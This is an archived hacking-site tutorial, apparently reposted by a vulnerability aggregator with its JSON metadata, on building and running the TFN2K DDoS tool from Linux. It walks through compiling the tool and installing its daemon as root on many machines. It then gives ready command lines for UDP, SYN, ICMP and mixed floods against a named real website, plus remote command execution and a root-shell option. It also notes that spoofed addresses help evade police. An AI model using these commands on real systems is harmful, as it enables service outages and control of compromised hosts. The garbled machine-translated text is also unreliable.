The use of LINUX systems with DDOS attacks for WINDOWS servers-vulnerability warning-the black bar safety net

Description

Use the moment the most famous of the REDHAT LINUX test,the present attack test I'm using FEDORA CORE3 ,software is the most famousDDOSattack tool TFN2K LINUX version,is to attack the WINDOWS Server system is using Windows 2000 Server service open APACHE2 FTP VNC little relationship,mainly to attack the APACHE

Decompression tar-zxvf tfn2k. tgz

Install TFN2K
TFN2K is an open source code software,so we need to compile,this needless to say,the compiler should will the right,but has
Several places is necessary to note that,because of the use of different versions and vendors of LINUX require different settings.
Modify the src/ip. h
Comment out the following section, otherwise compile error.

/struct in_addr
{
unsigned long int server_address;
};/
Then make to compile
When compiling you will be prompted to input the server password settings 8-3 2,(attack when need to enter password)after compilation will be out
Now two new files td and tfn,wherein td is the daemon,is also the client's use of the process,and tfn is the server
Control process,if you want to attack someone you must first start td this process,and then run the server process,otherwise the attack is invalid,
Change password you can perform mkpass be changed,finally, in all of the client install and run td(needs ROOT rights
Limit),and on the server create a text file,the file records all of the Client IP address(using VI to edit a
Feasible),in the format:
192.168.0.1
192.168.0.2
192.168.0.3
IP
IP
.....
And then running on the primary server./ tfn
2. Attack
./ tfn directly to the carriage return you can see some of the parameters,the English good friends estimated I don't need to speak more:)
Format./ tfn <parameter>
Useless parameter we do not mention,we have to attack with the
-f this parameter followed by just the written text of the file name,is the real achievement ofDDOSattacks,and not DOS
-h DOS attack,i.e. a single machine,one-on-one attack followed by a host or IP address
-p later to specify a port,needless to say.
-c the most critical parameters,a total of 1 1 selected phase
0 - to stop the attack,so kind of
1 - anti-spoofing level is set ,because TFN this tool in the attack when the packet sent with a source address,but
The source address is random,that is to say the address is not your self-sufficiency,so don't worry about cops,haha
2 - adaptation of the packet size: the default ICMP/8,smurf,udp attacks default to use the pouch. You can by
Change for each packet of payload bytes increases the size of it.
3 - bind root shell:start a session service, then you are connected to a specified port you can get a root
shell.
4 - UDP flood attack: this attack is the use of such a fact: each udp packet sent to a closed port, the
So there will be an ICMP unreachable information is returned, increase the attack ability.
5 - SYN flood attack: this attack has regularly sent false connection requests. The result will be the target port denial of service,
Tim hide it from the TCP connection table, by the absence of the host TCP/RST responses to increase the attack potential,is the standard denial of service attack
Click the.
6 - ICMP response(ping)attack: this attack sends a false address of the ping request, the target host will send back the same
The size of the response packet.
7 - SMURF attack: the target host address to send the ping request to the broadcast to expand, so that the target host will get back to
Covered a lot of times the reply.
8 - MIX attack: in a 1:1:1 relationship of alternating sends udp,syn,icmp packet, so that you can deal with the routing
Device, the other packet forwarding devices, NIDS,sniffers, etc., turns to bombing:)
9 - TARGA3 attack
1 0 - remote command execution,this parameter is the TFN of the additional features,in fact, the TFN attack is not only DOS,but also can
Remote of for explicit control,such as:
./ tfn-f hostext-c 1 0-i "mkdir /root/edison" in all of the HOST on the root home directory is established
edison,-i followed the"command"
Parameters of the basic finished,the following attack
./ tfn-f hostext-c 4-i www.163.com
Use hostext file records the host pair 1 6 3 server for a UDP attack(all of the hosts must have been starting
td process)
./ tfn-f hostext-c 5-i www.163.com -p 8 0
Use hostext file records the host pair 1 6 3 Server TCP denial of service attacks(8 0 attack WEB,other
Needless to say.)
./ tfn-f hostext-c 6-i www.163.com
Use hostext file records the host pair 1 6 3 server for ICMP attacks(PING attacks,and buffer overflow immediately
Crash)
./ tfn-f hostext-c 8-i www.163.com
Use hostext file records the host pair 1 6 3 server for ICMP&TCP&UDP turns to attack(if the other
Is sniffer a certain cry of the dead)
./ tfn-f hostext-c 0
Let the by the host to stop the attack

Test results:
One-on-one attack,the attack TCP connection local CPU13% is attacking the server CPU usage 7 0%
The above,and from time to time fluctuations
Two on one attack,the attack TCP connection local single CPU13% is attacking the server CPU usage
1 0 0%
Five against one attack,the attack TCP connection local single CPU13% is attack the server crash
Own home only 6 machines,but if another point,dozens of machine,generally the personal server is definitely dying off.
One-on-one attacks,attack ICMP connection mode local local CPU18% is attacking the server CPU usage
9 6% or more,and are always fluctuations
Two on one attack,attack ICMP connection mode local local single-machine CPU18% hacked server by not on
Network,almost impossible to use,half an hour within the crash

All product names, logos, and brands are property of their respective owners. All company, product and service names used in this website are for identification purposes only. Use of these names, logos, and brands does not imply endorsement.If you are an owner of some content and want it to be removed, please mail to content@vulners.com Vulners, 2018

Protected by

{"id": "MYHACK58:62200612500", "hash": "943ea131fa494cbc5b32fdded6c03eb4f13189669177d968bf1111968702ca6a", "history": [], "published": "2006-10-25T00:00:00", "hashmap": [{"hash": "caf9b6b99962bf5c2264824231d7a40c", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "d4be9c4fc84262b4f39f89565918568f", "key": "cvss"}, {"hash": "6d16bf68b25701ef9ff311edfe9686fe", "key": "description"}, {"hash": "b6f447f3251b059a962d09a4a2f3317d", "key": "href"}, {"hash": "be845ba49b2d253fbf3bf51051d223dd", "key": "modified"}, {"hash": "56765472680401499c79732468ba4340", "key": "objectVersion"}, {"hash": "be845ba49b2d253fbf3bf51051d223dd", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "645396391020478112635e14b34a0f8b", "key": "reporter"}, {"hash": "d468a36c064835d0c1c2d5dfb719144e", "key": "title"}, {"hash": "0665a8b0792e65b50ab13aef58a018dc", "key": "type"}], "type": "myhack58", "objectVersion": "1.2", "references": [], "edition": 1, "enchantments": {"score": {"value": 6.8, "vector": "NONE"}, "vulnersScore": 6.8}, "cvelist": [], "modified": "2006-10-25T00:00:00", "title": "The use of LINUX systems with DDOS attacks for WINDOWS servers-vulnerability warning-the black bar safety net", "viewCount": 1, "description": "Use the moment the most famous of the REDHAT LINUX test,the present attack test I'm using FEDORA CORE3 ,software is the most famous[DDOS](<http://www.myhack58.com/Article/60/sort096/Article_096_1.htm>)attack tool TFN2K LINUX version,is to attack the WINDOWS Server system is using Windows 2000 Server service open APACHE2 FTP VNC little relationship,mainly to attack the APACHE \n\n0. Decompression tar-zxvf tfn2k. tgz \n1. Install TFN2K \nTFN2K is an open source code software,so we need to compile,this needless to say,the compiler should will the right,but has \nSeveral places is necessary to note that,because of the use of different versions and vendors of LINUX require different settings. \nModify the src/ip. h \nComment out the following section, otherwise compile error. \n\n/*struct in_addr \n{ \nunsigned long int server_address; \n};*/ \nThen make to compile \nWhen compiling you will be prompted to input the server password settings 8-3 2,(attack when need to enter password)after compilation will be out \nNow two new files td and tfn,wherein td is the daemon,is also the client's use of the process,and tfn is the server \nControl process,if you want to attack someone you must first start td this process,and then run the server process,otherwise the attack is invalid, \nChange password you can perform mkpass be changed,finally, in all of the client install and run td(needs ROOT rights \nLimit),and on the server create a text file,the file records all of the Client IP address(using VI to edit a \nFeasible),in the format: \n192.168.0.1 \n192.168.0.2 \n192.168.0.3 \nIP \nIP \n..... \nAnd then running on the primary server./ tfn \n2. Attack \n./ tfn directly to the carriage return you can see some of the parameters,the English good friends estimated I don't need to speak more:) \nFormat./ tfn &lt;parameter&gt; \nUseless parameter we do not mention,we have to attack with the \n-f this parameter followed by just the written text of the file name,is the real achievement of[DDOS](<http://www.myhack58.com/Article/60/sort096/Article_096_1.htm>)attacks,and not DOS \n-h DOS attack,i.e. a single machine,one-on-one attack followed by a host or IP address \n-p later to specify a port,needless to say. \n-c the most critical parameters,a total of 1 1 selected phase \n0 - to stop the attack,so kind of \n1 - anti-spoofing level is set ,because TFN this tool in the attack when the packet sent with a source address,but \nThe source address is random,that is to say the address is not your self-sufficiency,so don't worry about cops,haha \n2 - adaptation of the packet size: the default ICMP/8,smurf,udp attacks default to use the pouch. You can by \nChange for each packet of payload bytes increases the size of it. \n3 - bind root shell:start a session service, then you are connected to a specified port you can get a root \nshell. \n4 - UDP flood attack: this attack is the use of such a fact: each udp packet sent to a closed port, the \nSo there will be an ICMP unreachable information is returned, increase the attack ability. \n5 - SYN flood attack: this attack has regularly sent false connection requests. The result will be the target port denial of service, \nTim hide it from the TCP connection table, by the absence of the host TCP/RST responses to increase the attack potential,is the standard denial of service attack \nClick the. \n6 - ICMP response(ping)attack: this attack sends a false address of the ping request, the target host will send back the same \nThe size of the response packet. \n7 - SMURF attack: the target host address to send the ping request to the broadcast to expand, so that the target host will get back to \nCovered a lot of times the reply. \n8 - MIX attack: in a 1:1:1 relationship of alternating sends udp,syn,icmp packet, so that you can deal with the routing \nDevice, the other packet forwarding devices, NIDS,sniffers, etc., turns to bombing:) \n9 - TARGA3 attack \n1 0 - remote command execution,this parameter is the TFN of the additional features,in fact, the TFN attack is not only DOS,but also can \nRemote of for explicit control,such as: \n./ tfn-f hostext-c 1 0-i \"mkdir /root/edison\" in all of the HOST on the root home directory is established \nedison,-i followed the\"command\" \nParameters of the basic finished,the following attack \n./ tfn-f hostext-c 4-i www.163.com \nUse hostext file records the host pair 1 6 3 server for a UDP attack(all of the hosts must have been starting \ntd process) \n./ tfn-f hostext-c 5-i www.163.com -p 8 0 \nUse hostext file records the host pair 1 6 3 Server TCP denial of service attacks(8 0 attack WEB,other \nNeedless to say.) \n./ tfn-f hostext-c 6-i www.163.com \nUse hostext file records the host pair 1 6 3 server for ICMP attacks(PING attacks,and buffer overflow immediately \nCrash) \n./ tfn-f hostext-c 8-i www.163.com \nUse hostext file records the host pair 1 6 3 server for ICMP&amp;TCP&amp;UDP turns to attack(if the other \nIs sniffer a certain cry of the dead) \n./ tfn-f hostext-c 0 \nLet the by the host to stop the attack \n\n\nTest results: \nOne-on-one attack,the attack TCP connection local CPU13% is attacking the server CPU usage 7 0% \nThe above,and from time to time fluctuations \nTwo on one attack,the attack TCP connection local single CPU13% is attacking the server CPU usage \n1 0 0% \nFive against one attack,the attack TCP connection local single CPU13% is attack the server crash \nOwn home only 6 machines,but if another point,dozens of machine,generally the personal server is definitely dying off. \nOne-on-one attacks,attack ICMP connection mode local local CPU18% is attacking the server CPU usage \n9 6% or more,and are always fluctuations \nTwo on one attack,attack ICMP connection mode local local single-machine CPU18% hacked server by not on \nNetwork,almost impossible to use,half an hour within the crash \n", "href": "http://www.myhack58.com/Article/html/3/62/2006/12500.htm", "bulletinFamily": "info", "reporter": "\u4f5a\u540d", "cvss": {"vector": "NONE", "score": 0.0}, "lastseen": "2016-11-12T18:21:53"}